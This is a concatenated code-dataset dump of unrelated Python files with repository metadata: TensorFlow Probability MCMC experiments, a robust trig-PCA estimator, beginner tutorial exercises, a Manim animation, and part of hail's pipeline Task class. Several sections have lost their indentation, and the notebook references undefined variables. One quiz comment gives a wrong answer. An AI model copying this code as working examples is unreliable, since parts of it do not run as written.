def do_sampling_old():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=init_old,
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=plp_old,
step_size=0.01,
num_leapfrog_steps=10))
states_old, kernel_results_old = do_sampling_old()
#%%
print(states_old)
#%%
def target_log_prob_fn_2(mu_b_, sigma_b_, b_offset_, ind_, alpha_):
b_raw_ = mu_b_ + sigma_b_ * b_offset_
beta_ = ind_ * b_raw_
conc_ = tf.exp(alpha_ + tf.matmul(tf.cast(x, dtype), beta_))
return test_model.log_prob((mu_b_, sigma_b_, b_offset_, b_raw_, ind_, beta_, alpha_, conc_, tf.cast(y, dtype)))
def target_log_prob_fn(mu_b_, sigma_b_, b_offset_, ind_, alpha_):
return test_model.log_prob((mu_b_, sigma_b_, b_offset_, ind_, alpha_, tf.cast(y, dtype)))
num_results = 5000
num_burnin_steps = 3000
@tf.function
def do_sampling_seq():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=params,
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn_2,
step_size=0.4,
num_leapfrog_steps=3))
states_seq, kernel_results_seq = do_sampling_seq()
#%%
print(states_seq)
#%%
def edward_model(x, n_total, K):
    """
    Model definition in Edward2: Dirichlet-multinomial regression with a
    spike-and-slab prior on the slopes (non-centered parametrization).
    Uses the module-level `dtype`.

    :param x: numpy array [NxD] - covariate matrix
    :param n_total: numpy array [N] - number of cells per sample
    :param K: Number of cell types
    :return: the DirichletMultinomial `predictions` random variable
             (the original docstring incorrectly said "none")
    """
    N, D = x.shape
    # normal prior on bias
    alpha = ed.Normal(loc=tf.zeros([K]), scale=tf.ones([K]) * 5, name="alpha")
    # Noncentered parametrization for raw slopes (before spike-and-slab)
    mu_b = ed.Normal(loc=tf.zeros(1, dtype=dtype), scale=tf.ones(1, dtype=dtype), name="mu_b")
    sigma_b = ed.HalfCauchy(tf.zeros(1, dtype=dtype), tf.ones(1, dtype=dtype), name="sigma_b")
    b_offset = ed.Normal(loc=tf.zeros([D, K], dtype=dtype), scale=tf.ones([D, K], dtype=dtype), name="b_offset")
    b_raw = mu_b + sigma_b * b_offset
    # Spike-and-slab priors
    sigma_ind_raw = ed.Normal(
        loc=tf.zeros(shape=[D, K], dtype=dtype),
        scale=tf.ones(shape=[D, K], dtype=dtype),
        name='sigma_ind_raw')
    ind_t = sigma_ind_raw * 50
    # sigmoid of the widened normal: a near-binary inclusion weight in (0, 1)
    ind = tf.exp(ind_t) / (1 + tf.exp(ind_t))
    # Calculate betas
    beta = ind * b_raw
    # Concentration vector from intercepts, slopes
    concentration_ = tf.exp(alpha + tf.matmul(x, beta))
    # Cell count prediction via DirMult
    predictions = ed.DirichletMultinomial(n_total, concentration=concentration_, name="predictions")
    return predictions
# Joint posterior distribution
log_joint_ed = ed.make_log_joint_fn(edward_model)
# Function to compute log posterior probability
target_log_prob_fn_ed = lambda alpha_, mu_b_, sigma_b_, b_offset_, sigma_ind_raw_: \
log_joint_ed(x=tf.cast(x, dtype),
n_total=tf.cast(n_total, dtype),
K=K,
predictions=tf.cast(y, dtype),
alpha=alpha_,
mu_b=mu_b_,
sigma_b=sigma_b_,
b_offset=b_offset_,
sigma_ind_raw=sigma_ind_raw_,
)
alpha_size = [K]
beta_size = [D, K]
# MCMC starting values
params_ed = [tf.zeros(alpha_size, name='init_alpha', dtype=dtype),
# tf.random.normal(alpha_size, 0, 1, name='init_alpha'),
tf.zeros(1, name="init_mu_b", dtype=dtype),
tf.ones(1, name="init_sigma_b", dtype=dtype),
tf.zeros(beta_size, name='init_b_offset', dtype=dtype),
# tf.random.normal(beta_size, 0, 1, name='init_b_offset'),
tf.zeros(beta_size, name='init_sigma_ind_raw', dtype=dtype),
]
print(target_log_prob_fn_ed(params_ed[0], params_ed[1], params_ed[2], params_ed[3], params_ed[4]))
#%%
num_schools = 8 # number of schools
treatment_effects = np.array(
[28, 8, -3, 7, -1, 1, 18, 12], dtype=np.float32) # treatment effects
treatment_stddevs = np.array(
[15, 10, 16, 11, 9, 11, 10, 18], dtype=np.float32) # treatment SE
#%%
model_seq = tfd.JointDistributionSequential([
tfd.Normal(loc=0., scale=10., name="avg_effect"), # `mu` above
tfd.Normal(loc=5., scale=1., name="avg_stddev"), # `log(tau)` above
tfd.Independent(tfd.Normal(loc=tf.zeros(num_schools),
scale=tf.ones(num_schools),
name="school_effects_standard"), # `theta_prime`
reinterpreted_batch_ndims=1),
lambda school_effects_standard, avg_stddev, avg_effect: (
tfd.Independent(tfd.Normal(loc=(avg_effect[..., tf.newaxis] +
tf.exp(avg_stddev[..., tf.newaxis]) *
school_effects_standard), # `theta` above
scale=treatment_stddevs),
name="treatment_effects", # `y` above
reinterpreted_batch_ndims=1))
])
def target_log_prob_fn_seq(avg_effect, avg_stddev, school_effects_standard):
"""Unnormalized target density as a function of states."""
return model_seq.log_prob((
avg_effect, avg_stddev, school_effects_standard, treatment_effects))
print(model_seq.log_prob([tf.zeros([], name='init_avg_effect'),
tf.zeros([], name='init_avg_stddev'),
tf.ones([num_schools], name='init_school_effects_standard'),
treatment_effects
]))
print(model_seq.sample())
#%%
model_named = tfd.JointDistributionNamed(dict(
avg_effect=tfd.Normal(loc=0., scale=10., name="avg_effect"), # `mu` above
avg_stddev=tfd.Normal(loc=5., scale=1., name="avg_stddev"), # `log(tau)` above
school_effects_standard=tfd.Independent(tfd.Normal(loc=tf.zeros(num_schools),
scale=tf.ones(num_schools),
name="school_effects_standard"), # `theta_prime`
reinterpreted_batch_ndims=1),
treatment_effects=lambda school_effects_standard, avg_stddev, avg_effect: (
tfd.Independent(tfd.Normal(loc=(avg_effect[..., tf.newaxis] +
tf.exp(avg_stddev[..., tf.newaxis]) *
school_effects_standard), # `theta` above
scale=treatment_stddevs),
name="treatment_effects", # `y` above
reinterpreted_batch_ndims=1))
))
def target_log_prob_fn_named(avg_effect, avg_stddev, school_effects_standard):
"""Unnormalized target density as a function of states."""
return model_named.log_prob((
avg_effect, avg_stddev, school_effects_standard, treatment_effects))
print(model_named.log_prob(dict(avg_effect=tf.zeros([], name='init_avg_effect'),
avg_stddev=tf.zeros([], name='init_avg_stddev'),
school_effects_standard=tf.ones([num_schools], name='init_school_effects_standard'),
treatment_effects=treatment_effects
)))
print(model_named.sample())
#%%
num_results = 5000
num_burnin_steps = 3000
# Improve performance by tracing the sampler using `tf.function`
# and compiling it using XLA.
@tf.function
def do_sampling_named():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=dict(avg_effect=tf.zeros([], name='init_avg_effect'),
avg_stddev=tf.zeros([], name='init_avg_stddev'),
school_effects_standard=tf.ones([num_schools], name='init_school_effects_standard'),
),
#current_state=(
# tf.zeros([], name='init_avg_effect'),
# tf.zeros([], name='init_avg_stddev'),
# tf.ones([num_schools], name='init_school_effects_standard'),
#),
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn_named,
step_size=0.4,
num_leapfrog_steps=3))
states_named, kernel_results_named = do_sampling_named()
#%%
@tf.function
def do_sampling_seq():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=[
tf.zeros([], name='init_avg_effect'),
tf.zeros([], name='init_avg_stddev'),
tf.ones([num_schools], name='init_school_effects_standard'),
],
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn_seq,
step_size=0.4,
num_leapfrog_steps=3))
states_seq, kernel_results_seq = do_sampling_seq()
#%%
print(states_seq)
#%%
avg_effect, avg_stddev, school_effects_standard = states
school_effects_samples = (
avg_effect[:, np.newaxis] +
np.exp(avg_stddev)[:, np.newaxis] * school_effects_standard)
num_accepted = np.sum(kernel_results.is_accepted)
print('Acceptance rate: {}'.format(num_accepted / num_results))
#%%
current_state = [
tf.zeros([], name='init_avg_effect'),
tf.zeros([], name='init_avg_stddev'),
tf.ones([num_schools], name='init_school_effects_standard'),
]
current_state_2 = dict(avg_effect=tf.zeros([], name='init_avg_effect'),
avg_stddev=tf.zeros([], name='init_avg_stddev'),
school_effects_standard=tf.ones([num_schools], name='init_school_effects_standard'),
)
[tf.convert_to_tensor(value=x) for x in current_state_2]
#%%
from tensorflow_probability.python.mcmc.internal import util as mcmc_util
init_state = current_state_2
if not (mcmc_util.is_list_like(init_state) or isinstance(init_state, dict)):
init_state = [init_state]
print(init_state)
if isinstance(init_state, dict):
init_state = {k: tf.convert_to_tensor(value=v) for k, v in init_state.items()}
else:
init_state = [tf.convert_to_tensor(value=x) for x in init_state]
print(init_state)
#%%
# minimal example for github issue
b = np.random.normal(0., 1.)
model_seq = tfd.JointDistributionSequential([
tfd.Normal(loc=0., scale=1., name="a"),
lambda a: tfd.Normal(loc=a, scale=1., name="b")
])
def target_log_prob_fn_seq(a):
return model_seq.log_prob((a, b))
init_seq = [tf.zeros([], name="init_a")]
model_name = tfd.JointDistributionNamed(dict(
a=tfd.Normal(loc=0., scale=1., name="a"),
b=lambda a: tfd.Normal(loc=a, scale=1., name="b")
))
def target_log_prob_fn_name(a):
return model_name.log_prob((a, b))
init_name = dict(a=tf.zeros([], name="init_a"))
num_results = 5000
num_burnin_steps = 3000
@tf.function
def sample_mcmc(init, target_log_prob_fn):
    """Run an HMC chain (traced with tf.function).

    init -- initial chain state; a list for the JointDistributionSequential
            model or a dict for the JointDistributionNamed model above.
    target_log_prob_fn -- unnormalized log-density matching init's layout.

    Uses the module-level num_results / num_burnin_steps settings.
    """
    return tfp.mcmc.sample_chain(
        num_results=num_results,
        num_burnin_steps=num_burnin_steps,
        current_state=init,
        kernel=tfp.mcmc.HamiltonianMonteCarlo(
            target_log_prob_fn=target_log_prob_fn,
            step_size=0.01,
            num_leapfrog_steps=3))
states_seq, kernel_results_seq = sample_mcmc(init_seq, target_log_prob_fn_seq)
print(states_seq)
#%%
states_name, kernel_results_name = sample_mcmc(init_name, target_log_prob_fn_name)
print(states_seq)
|
[
"johannes.ostner@online.de"
] |
johannes.ostner@online.de
|
5d9a610b671aea260855ece5544c4f19615d8bfd
|
cc157f558008596a8cef86fe495fe6166b154c8a
|
/robust/trig-pca.py
|
4537416c5cc8e72ff46f7fffd5ea0fb0f441ca78
|
[] |
no_license
|
Albuso0/estimator_test
|
f2c2d1f1e3e812ed6a1925c70227fae6775836c3
|
085a94e13148c614123fd2277342b452660f47a2
|
refs/heads/master
| 2021-01-13T00:48:24.926191
| 2019-06-04T03:34:31
| 2019-06-04T03:34:31
| 51,336,220
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
import numpy as np
from numpy.random import randn
from numpy.linalg import eigh, norm
def dist(u, v):
    """Euclidean distance between u and v modulo a constant all-ones shift.

    The difference u - v is recentred to mean zero before taking the norm,
    so adding the same constant to every coordinate of u (or v) leaves the
    result unchanged.
    """
    diff = u - v
    shift = -np.sum(diff) / len(u)
    return norm(diff + shift * np.ones(len(u)))
def lead_eigvec(m):
    """Eigenvector of the symmetric/Hermitian matrix m for its largest
    eigenvalue.  eigh returns eigenvalues in ascending order, so the
    descending sort puts the leading pair first."""
    w, v = eigh(m)
    descending = w.argsort()[::-1]
    return v[:, descending[0]]
def exp(n,d,eps):
    """One random trial of the trigonometric-PCA mean estimator.

    n   -- sample size; d -- dimension; eps -- corrupted fraction.

    An eps fraction of a standard-normal sample is shifted by the
    alternating +/-1 vector.  Returns (dtrig, dbase, excess): the trig-PCA
    error, the oracle error (mean over the clean samples only), and their
    difference, all measured with dist(), i.e. modulo a constant shift.
    """
    x = randn(n,d)
    vQ = np.ones(d)
    for i in range(0,d,2):
        vQ[i]=-1
    nQ = int(n*eps)
    Q = np.tile(vQ,(nQ,1))
    # Corrupt the first nQ rows by adding the shift vector.
    x[0:nQ,:] = x[0:nQ,:] + Q
    mu_base = np.mean(x[nQ:,:], axis=0)
    mu_naive = np.mean(x, axis=0)  # NOTE(review): computed but never used
    # print(mu_base, '\n')
    # Empirical second moment of exp(i*x); off-diagonal entries are then
    # rescaled by e (matching the exp(-1) factor used in population_exp).
    y = np.exp(1j*x)
    m = y.T @ y.conjugate() / n
    m1 = (m-np.eye(d))*np.exp(1)+np.eye(d)
    # m1 = np.ones((d,d))
    # print(m1,'\n')
    z = lead_eigvec(m1)
    mu = np.angle(z)
    # Wrap angles that fell near -pi back onto the positive branch.
    for i in range(d):
        if mu[i]<-3:
            mu[i] += 2*np.pi
    # print(mu,'\n')
    dtrig = dist(mu,np.zeros(d))
    dbase = dist(mu_base,np.zeros(d))
    excess = dtrig - dbase
    return dtrig, dbase, excess
def population_exp(d, eps):
    """Population (infinite-sample) error of the trig-PCA mean estimator in
    dimension d with an eps fraction of contamination placed at the
    alternating +/-1 vector."""
    corruption = np.ones(d)
    corruption[0:d:2] = -1  # flip the sign on even coordinates
    z_corrupt = np.exp(1j * corruption)
    m_corrupt = np.outer(z_corrupt, z_corrupt.conjugate())
    eye = np.eye(d)
    # Population second moments of exp(i*x) for the clean (mean-zero) and
    # corrupted components; off-diagonals carry the e^-1 factor.
    m_clean = (np.ones((d, d)) - eye) * np.exp(-1) + eye
    m_dirty = (m_corrupt - eye) * np.exp(-1) + eye
    mixture = (1 - eps) * m_clean + eps * m_dirty
    # Undo the e^-1 shrinkage before extracting the leading eigenvector.
    rescaled = (mixture - eye) * np.exp(1) + eye
    mu = np.angle(lead_eigvec(rescaled))
    # Wrap angles that fell near -pi back onto the positive branch.
    mu[mu < -3] += 2 * np.pi
    return dist(mu, np.zeros(d))
# d=2
# n=50000
# eps = 0.
# dtrig, dbase, excess = exp(n,d,eps)
# dtrig_p = population_exp(d,eps)
# print(d, n, dtrig, dbase, excess, excess/np.sqrt(d), dtrig_p, dtrig_p/np.sqrt(d))
## test estimation error scaling with d
# Sweep dimension d (sample size n = 10*d, eps = 0.1 contamination); print one
# row per d: empirical and population errors plus sqrt(d)-normalized values.
for d in range(20,401,5):
    n = d*10
    eps = 0.1
    dtrig, dbase, excess = exp(n,d,eps)
    dtrig_p = population_exp(d,eps)
    print(d, n, dtrig, dbase, excess, excess/np.sqrt(d), dtrig_p, dtrig_p/np.sqrt(d))
|
[
"pengkuny@princeton.edu"
] |
pengkuny@princeton.edu
|
95a8bc7f9e30737cf5cadb80f990f0fd2ae4ece8
|
7092de5632b9f0f07bd3af1d84162c36d83399bc
|
/20200321.py
|
7f1c56773e5aaf7708bfc36fb31596384a560a67
|
[] |
no_license
|
wjc1022/hello-python
|
96f98a1b51136552128b18a882721c2238db52ce
|
9f2b680318d9a051ac10427ca889645f3afd54ec
|
refs/heads/master
| 2021-03-01T06:20:15.383411
| 2020-03-24T14:41:58
| 2020-03-24T14:41:58
| 245,759,953
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,157
|
py
|
#廖雪峰 使用list和tuple#
# https://www.liaoxuefeng.com/wiki/1016959663602400/1017092876846880
# -*- coding: utf-8 -*-
# Nested-list indexing exercise (from the Liao Xuefeng tutorial).
L = [
    ['Apple', 'Google', 'Microsoft'],
    ['Java', 'Python', 'Ruby', 'PHP'],
    ['Adam', 'Bart', 'Lisa']
]
# print Apple:
print(L[0][0])
# print Python:
print(L[1][1])
# print Lisa:
print(L[2][2])
# Quiz: which of the following variables are tuples?
# Author's noted answer: c.  NOTE(review): (1) is an int and [2] is a list;
# the tuples are actually a, d and e — (3,) needs the trailing comma.
a = ()
b = (1)
c = [2]
d = (3,)
e = (4,5,6)
#条件判断
#小明身高1.75,体重80.5kg。
# 请根据BMI公式(体重除以身高的平方)帮小明计算他的BMI指数,
# 并根据BMI指数:
# 低于18.5:过轻
# 18.5-25:正常
# 25-28:过重
# 28-32:肥胖
# 高于32:严重肥胖
# -*- coding: utf-8 -*-
# BMI exercise: weight (kg) divided by height (m) squared.
height = 1.75
weight = 80.5
bmi = weight / height / height
# Half-open intervals so boundary values (exactly 18.5 / 25 / 28 / 32) are
# classified; the original `18.5 < bmi < 25`-style chains let a boundary
# value fall through every branch to the final else ('严重肥胖').
if bmi < 18.5:
    print(bmi, '过轻')
elif bmi < 25:
    print(bmi, '正常')
elif bmi < 28:
    print(bmi, '过重')
elif bmi < 32:
    print(bmi, '肥胖')
else:
    print(bmi, '严重肥胖')
#循环
# 练习
# 请利用循环依次对list中的每个名字打印出Hello, xxx!:
# Greet every name on the list.
l = ['Bart', 'Lisa', 'Adam']
for person in l:
    print('Hello,' + person)
|
[
"61908340+wzy0604@users.noreply.github.com"
] |
61908340+wzy0604@users.noreply.github.com
|
8ffa5956491d37c182af81da35db2a86a9de9ff7
|
3b82764ceb20d1d969c66735d0c651f5c59559c2
|
/as1/collatz.py
|
681dc1e788a3ede8f7828277469d68b0411c3997
|
[] |
no_license
|
sawyermade/advanced-python
|
d4bb24d5b6843cb1150836b2f2613952d542b7af
|
dff32f8a933f641e1298d702b7ec904cf42c1a7d
|
refs/heads/master
| 2021-08-23T06:40:35.480626
| 2017-12-03T23:38:13
| 2017-12-03T23:38:13
| 105,158,454
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
'''
Daniel Sawyer Assignment 1 Collatz Fall 2017
'''
def collatz_sequence():
    """Prompt for an integer and print its Collatz sequence down to 1.

    Returns True when a sequence was printed, False on invalid input.
    """
    raw = input('Enter number: ')
    try:
        n = int(raw)  # only the conversion can raise ValueError
    except ValueError:
        print('Invalid input: must be an integer')
        return False
    print()
    if n == 1:
        # The sequence for 1 is just itself.
        print(n)
        return True
    # Step until the sequence reaches 1.
    while n > 1:
        n = collatz(n)
    return True
def collatz(number):
    """Print and return the next Collatz value: n // 2 if n is even,
    3n + 1 if n is odd."""
    nxt = number // 2 if number % 2 == 0 else 3 * number + 1
    print(nxt)
    return nxt
# if __name__ == "__main__":
# collatz_sequence()
# exit()
# Script entry point: prompts on stdin, then terminates the interpreter.
collatz_sequence()
exit()
|
[
"sawyermade@gmail.com"
] |
sawyermade@gmail.com
|
8742bce90ee9b3cc66ac7fcd32df979e8bd3a412
|
c9f70590f9a2c3d5bc89ae03458947245258bc1f
|
/manim/AnimateExample.py
|
1e25ab389beba09fec5f27649de2be7664b0b5a3
|
[
"ISC"
] |
permissive
|
thobl/ipelets
|
4d3cea5a35098678d2ec3da7f0c137185ae6956e
|
f197e7ae52547c4ba85d2458ae0013ed8f0169f7
|
refs/heads/master
| 2022-11-22T01:32:26.972198
| 2022-11-07T16:53:14
| 2022-11-07T16:53:14
| 353,351,287
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,851
|
py
|
from manim import *
class AnimateExample(Scene):
    """Five-step shape animation.

    View 1 creates four shapes; view 2 morphs three of them while fading the
    grey triangle out; view 3 restores the view-1 layout and adds two new
    triangles; views 4-5 fade everything out.
    """

    # Vertex lists reused by several views (the original code repeated each
    # of these verbatim once per view).
    GREY_TRIANGLE_PTS = [
        [-4.5511111111111, 1.44, 0],
        [-6.1511111111111, 0.48, 0],
        [-3.5911111111111, 0.16, 0],
    ]
    OKTAGON_PTS = [
        [0.24888888888889, -0.8, 0],
        [-0.032291111111111, -0.12118, 0],
        [-0.71111111111111, 0.16, 0],
        [-1.3899311111111, -0.12118, 0],
        [-1.6711111111111, -0.8, 0],
        [-1.3899311111111, -1.47882, 0],
        [-0.71111111111111, -1.76, 0],
        [-0.032291111111111, -1.47882, 0],
    ]
    SQUARE_PTS = [
        [-6.4711111111111, -0.48, 0],
        [-6.4711111111111, -1.76, 0],
        [-5.1911111111111, -1.76, 0],
        [-5.1911111111111, -0.48, 0],
    ]

    def construct(self):
        self.camera.background_color = WHITE

        # Shared colors.
        black = rgb_to_color([0.0, 0.0, 0.0])
        grey = rgb_to_color([0.827, 0.827, 0.827])
        green = rgb_to_color([0.565, 0.933, 0.565])
        yellow = rgb_to_color([1.0, 1.0, 0.878])
        dark_green = rgb_to_color([0.0, 0.392, 0.0])

        # Factory helpers for shapes constructed identically in several views.
        def grey_triangle():
            return Polygon(*self.GREY_TRIANGLE_PTS, color=black,
                           fill_color=grey, fill_opacity=1)

        def green_circle(center_y):
            return Circle(radius=0.64,
                          arc_center=[-3.2711111111111, center_y, 0.0],
                          color=black, fill_color=green, fill_opacity=1)

        def yellow_square():
            return Polygon(*self.SQUARE_PTS, color=black,
                           fill_color=yellow, fill_opacity=1)

        ## view 1: create the four initial shapes
        object_with_no_label1_v1 = grey_triangle()
        circle_v1 = green_circle(-1.12)
        oktagon_v1 = Polygon(*self.OKTAGON_PTS, color=dark_green)
        square_v1 = yellow_square()
        self.play(
            Create(object_with_no_label1_v1),
            Create(circle_v1),
            Create(oktagon_v1),
            Create(square_v1),
        )

        ## view 2: circle drops, oktagon becomes filled (no stroke),
        ## square turns into a diamond; grey triangle fades out
        circle_v2 = green_circle(-2.4)
        oktagon_v2 = Polygon(*self.OKTAGON_PTS, stroke_opacity=0.0,
                             fill_color=green, fill_opacity=1)
        square_v2 = Polygon(
            [-6.7362031111111, -1.12, 0],
            [-5.8311071111111, -2.025096, 0],
            [-4.9260111111111, -1.12, 0],
            [-5.8311071111111, -0.2149, 0],
            color=black, fill_color=yellow, fill_opacity=1,
        )
        self.play(
            FadeOut(object_with_no_label1_v1),
            Transform(circle_v1, circle_v2),
            Transform(oktagon_v1, oktagon_v2),
            Transform(square_v1, square_v2),
        )
        self.remove(object_with_no_label1_v1)
        self.remove(circle_v1)
        self.remove(oktagon_v1)
        self.remove(square_v1)

        ## view 3: back to the view-1 layout plus two new triangles
        object_with_no_label1_v3 = grey_triangle()
        circle_v3 = green_circle(-1.12)
        square_v3 = yellow_square()
        object_with_no_label2_v3 = Polygon(
            [-2.6311111111111, 1.12, 0],
            [-1.6711111111111, -0.48, 0],
            [-1.0311111111111, 1.12, 0],
            color=black, fill_color=grey, fill_opacity=1,
        )
        triangle_v3 = Polygon(
            [-6.7911111111111, -3.68, 0],
            [-5.5111111111111, -2.4, 0],
            [-4.5511111111111, -3.68, 0],
            color=black,
            fill_color=rgb_to_color([0.678, 0.847, 0.902]),
            fill_opacity=1,
        )
        oktagon_v3 = Polygon(*self.OKTAGON_PTS, color=dark_green)
        self.play(
            Create(object_with_no_label1_v3),
            Transform(circle_v2, circle_v3),
            Transform(square_v2, square_v3),
            Create(object_with_no_label2_v3),
            Create(triangle_v3),
            Transform(oktagon_v2, oktagon_v3),
        )
        self.remove(circle_v2)
        self.remove(square_v2)
        self.remove(oktagon_v2)

        ## view 4: fade out everything except the two new triangles
        self.play(
            FadeOut(object_with_no_label1_v3),
            FadeOut(circle_v3),
            FadeOut(square_v3),
            FadeOut(oktagon_v3),
        )
        self.remove(object_with_no_label1_v3)
        self.remove(circle_v3)
        self.remove(square_v3)
        self.remove(oktagon_v3)

        ## view 5: fade out the remaining triangles
        self.play(
            FadeOut(triangle_v3),
            FadeOut(object_with_no_label2_v3),
        )
        self.remove(triangle_v3)
        self.remove(object_with_no_label2_v3)
[
"thomas.blaesius@kit.edu"
] |
thomas.blaesius@kit.edu
|
00c84dfe665dbb738ca50b70040e7c837c595038
|
4f9930e15c02cb9a09af70d66b794480b8c9bd57
|
/hail/python/hailtop/pipeline/task.py
|
a2472c4ff18e3f5de5f9d7a3a7b3edab693c4253
|
[
"MIT"
] |
permissive
|
gsarma/hail
|
d76aa16d718618c1915b629077fd80cbc4d3b526
|
6aa2d945bb7d57c463d5ab9afb686f18c2941b25
|
refs/heads/master
| 2020-06-20T06:09:43.408615
| 2019-10-29T21:40:23
| 2019-10-29T21:40:23
| 196,250,453
| 0
| 0
|
MIT
| 2019-07-10T17:44:48
| 2019-07-10T17:44:47
| null |
UTF-8
|
Python
| false
| false
| 12,654
|
py
|
import re
from .resource import ResourceFile, ResourceGroup
from .utils import PipelineException
def _add_resource_to_set(resource_set, resource, include_rg=True):
    """Add *resource* to *resource_set*, expanding resource groups.

    A ResourceGroup itself is added only when *include_rg* is True; the
    individual files of a group (whether *resource* is the group or a file
    belonging to one) are always added.
    """
    if isinstance(resource, ResourceGroup):
        group = resource
        if include_rg:
            resource_set.add(group)
    else:
        resource_set.add(resource)
        group = None
        if isinstance(resource, ResourceFile) and resource._has_resource_group():
            group = resource._get_resource_group()

    if group is not None:
        for resource_file in group._resources.values():
            resource_set.add(resource_file)
class Task:
    """
    Object representing a single job to execute.

    Examples
    --------
    Create a pipeline object:

    >>> p = Pipeline()

    Create a new pipeline task that prints hello to a temporary file `t.ofile`:

    >>> t = p.new_task()
    >>> t.command(f'echo "hello" > {t.ofile}')

    Write the temporary file `t.ofile` to a permanent location

    >>> p.write_output(t.ofile, 'hello.txt')

    Execute the DAG:

    >>> p.run()

    Notes
    -----
    This class should never be created directly by the user. Use `Pipeline.new_task` instead.
    """

    _counter = 0
    _uid_prefix = "__TASK__"
    # Matches uids like "__TASK__7"; used to detect Task references in commands.
    _regex_pattern = r"(?P<TASK>{}\d+)".format(_uid_prefix)

    @classmethod
    def _new_uid(cls):
        """Return a process-unique uid of the form "__TASK__<n>"."""
        uid = "{}{}".format(cls._uid_prefix, cls._counter)
        cls._counter += 1
        return uid

    def __init__(self, pipeline, name=None, attributes=None):
        self._pipeline = pipeline
        self.name = name
        self.attributes = attributes
        self._cpu = None
        self._memory = None
        self._storage = None
        self._image = None
        self._command = []

        self._resources = {}  # dict of name to resource
        self._resources_inverse = {}  # dict of resource to name
        self._uid = Task._new_uid()

        self._inputs = set()
        self._internal_outputs = set()
        self._external_outputs = set()
        self._mentioned = set()  # resources used in the command
        self._valid = set()  # resources declared in the appropriate place
        self._dependencies = set()

    def _get_resource(self, item):
        # Lazily create a task resource file the first time `item` is referenced.
        if item not in self._resources:
            r = self._pipeline._new_task_resource_file(self)
            self._resources[item] = r
            self._resources_inverse[r] = item

        return self._resources[item]

    def __getitem__(self, item):
        return self._get_resource(item)

    def __getattr__(self, item):
        # Only invoked when normal attribute lookup fails, so real attributes
        # such as self._resources are unaffected.
        return self._get_resource(item)

    def _add_internal_outputs(self, resource):
        _add_resource_to_set(self._internal_outputs, resource, include_rg=False)

    def _add_inputs(self, resource):
        _add_resource_to_set(self._inputs, resource, include_rg=False)

    def declare_resource_group(self, **mappings):
        """
        Declare a resource group for a task.

        Examples
        --------
        Declare a resource group:

        >>> input = p.read_input_group(bed='data/example.bed',
        ...                            bim='data/example.bim',
        ...                            fam='data/example.fam')
        >>> t = p.new_task()
        >>> t.declare_resource_group(tmp1={'bed': '{root}.bed',
        ...                                'bim': '{root}.bim',
        ...                                'fam': '{root}.fam',
        ...                                'log': '{root}.log'})
        >>> t.command(f"plink --bfile {input} --make-bed --out {t.tmp1}")

        Caution
        -------
        Be careful when specifying the expressions for each file as this is Python
        code that is executed with `eval`!

        Parameters
        ----------
        mappings: :obj:`dict` of :obj:`str` to :obj:`dict` of :obj:`str` to :obj:`str`
            Keywords are the name(s) of the resource group(s). The value is a dict
            mapping the individual file identifier to a string expression representing
            how to transform the resource group root name into a file. Use `{root}`
            for the file root.

        Returns
        -------
        :class:`.Task`
            Same task object with resource groups set.
        """
        for name, d in mappings.items():
            assert name not in self._resources
            if not isinstance(d, dict):
                raise PipelineException(f"value for name '{name}' is not a dict. Found '{type(d)}' instead.")
            rg = self._pipeline._new_resource_group(self, d)
            self._resources[name] = rg
            _add_resource_to_set(self._valid, rg)
        return self

    def depends_on(self, *tasks):
        """
        Explicitly set dependencies on other tasks.

        Examples
        --------
        Create the first task:

        >>> t1 = p.new_task()
        >>> t1.command(f'echo "hello"')

        Create the second task that depends on `t1`:

        >>> t2 = p.new_task()
        >>> t2.depends_on(t1)
        >>> t2.command(f'echo "world"')

        Notes
        -----
        Dependencies between tasks are automatically created when resources from
        one task are used in a subsequent task. This method is only needed when
        no intermediate resource exists and the dependency needs to be explicitly
        set.

        Parameters
        ----------
        tasks: :class:`.Task`, varargs
            Sequence of tasks to depend on.

        Returns
        -------
        :class:`.Task`
            Same task object with dependencies set.
        """
        for t in tasks:
            self._dependencies.add(t)
        # BUGFIX: return self as documented, so depends_on can be chained like
        # the other builder methods (storage/memory/cpu/image/command).
        return self

    def command(self, command):
        """
        Set the task's command to execute.

        Examples
        --------

        Simple task with no output files:

        >>> p = Pipeline()
        >>> t1 = p.new_task()
        >>> t1.command(f'echo "hello"')
        >>> p.run()

        Simple task with one temporary file `t2.ofile` that is written to a
        permanent location:

        >>> p = Pipeline()
        >>> t2 = p.new_task()
        >>> t2.command(f'echo "hello world" > {t2.ofile}')
        >>> p.write_output(t2.ofile, 'output/hello.txt')
        >>> p.run()

        Two tasks with a file interdependency:

        >>> p = Pipeline()
        >>> t3 = p.new_task()
        >>> t3.command(f'echo "hello" > {t3.ofile}')
        >>> t4 = p.new_task()
        >>> t4.command(f'cat {t3.ofile} > {t4.ofile}')
        >>> p.write_output(t4.ofile, 'output/cat_output.txt')
        >>> p.run()

        Specify multiple commands in the same task:

        >>> p = Pipeline()
        >>> t5 = p.new_task()
        >>> t5.command(f'echo "hello" > {t5.tmp1}')
        >>> t5.command(f'echo "world" > {t5.tmp2}')
        >>> t5.command(f'echo "!" > {t5.tmp3}')
        >>> t5.command(f'cat {t5.tmp1} {t5.tmp2} {t5.tmp3} > {t5.ofile}')
        >>> p.write_output(t5.ofile, 'output/concatenated.txt')
        >>> p.run()

        Notes
        -----
        This method can be called more than once. It's behavior is to
        append commands to run to the set of previously defined commands
        rather than overriding an existing command.

        To declare a resource file of type :class:`.TaskResourceFile`, use either
        the get attribute syntax of `task.{identifier}` or the get item syntax of
        `task['identifier']`. If an object for that identifier doesn't exist,
        then one will be created automatically (only allowed in the :meth:`.command`
        method). The identifier name can be any valid Python identifier
